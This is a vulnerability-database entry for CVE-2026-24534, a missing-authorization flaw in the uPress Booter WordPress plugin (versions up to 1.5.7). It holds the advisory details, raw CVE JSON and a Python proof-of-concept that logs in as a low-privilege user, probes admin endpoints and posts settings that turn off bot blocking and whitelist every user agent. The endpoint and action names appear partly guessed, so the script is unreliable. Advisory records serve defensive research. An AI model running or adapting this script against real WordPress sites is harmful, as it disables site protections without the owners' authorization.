Security Vulnerability Report
中文
CVE-2026-24534 CVSS 4.3 MEDIUM

CVE-2026-24534

Published: 2026-01-23 15:16:09
Last Modified: 2026-04-28 15:16:11

Description

Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booter: from n/a through <= 1.5.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

booter-bots-crawlers-manager WordPress插件 <= 1.5.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24534 PoC - Missing Authorization in uPress Booter Plugin # Affected: booter-bots-crawlers-manager <= 1.5.7 import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit_cve_2026_24534(): """ This PoC demonstrates the missing authorization vulnerability in booter-bots-crawlers-manager WordPress plugin. Low-privilege authenticated users can access admin functions. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Access protected admin functions without proper authorization # These endpoints should require admin privileges but don't protected_endpoints = [ '/wp-admin/admin.php?page=booter-settings', '/wp-admin/admin.php?page=booter-bots-list', '/wp-admin/admin.php?page=booter-crawlers-manager', '/wp-json/booter/v1/config' ] for endpoint in protected_endpoints: url = f"{TARGET_URL}{endpoint}" response = session.get(url) if response.status_code == 200: print(f"[VULN] Accessible: {endpoint}") print(f" Status Code: {response.status_code}") # Check if sensitive data is exposed if 'booter' in response.text.lower() or 'config' in response.text.lower(): print(f" [CONFIRMED] Sensitive configuration exposed") # Step 3: Modify bot/crawler rules (exploit the broken access control) modify_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" modify_data = { 'action': 'booter_update_settings', 'settings': '{"blocked_ips":[],"whitelist_agents":["*"],"block_enabled":false}', 'nonce': '' # May not be properly validated } response = session.post(modify_url, data=modify_data) if response.status_code == 200: print("[VULN] Successfully modified bot/crawler management settings") print(f"[VULN] Attack completed - access control bypassed") return True if __name__ == "__main__": print("CVE-2026-24534 PoC - uPress Booter Missing Authorization") print("=" * 60) exploit_cve_2026_24534()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24534", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:09.427", "lastModified": "2026-04-28T15:16:11.133", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booter: from n/a through <= 1.5.7."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en uPress Booter booter-bots-crawlers-manager permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Booter: desde n/a hasta &lt;= 1.5.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/booter-bots-crawlers-manager/vulnerability/wordpress-booter-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}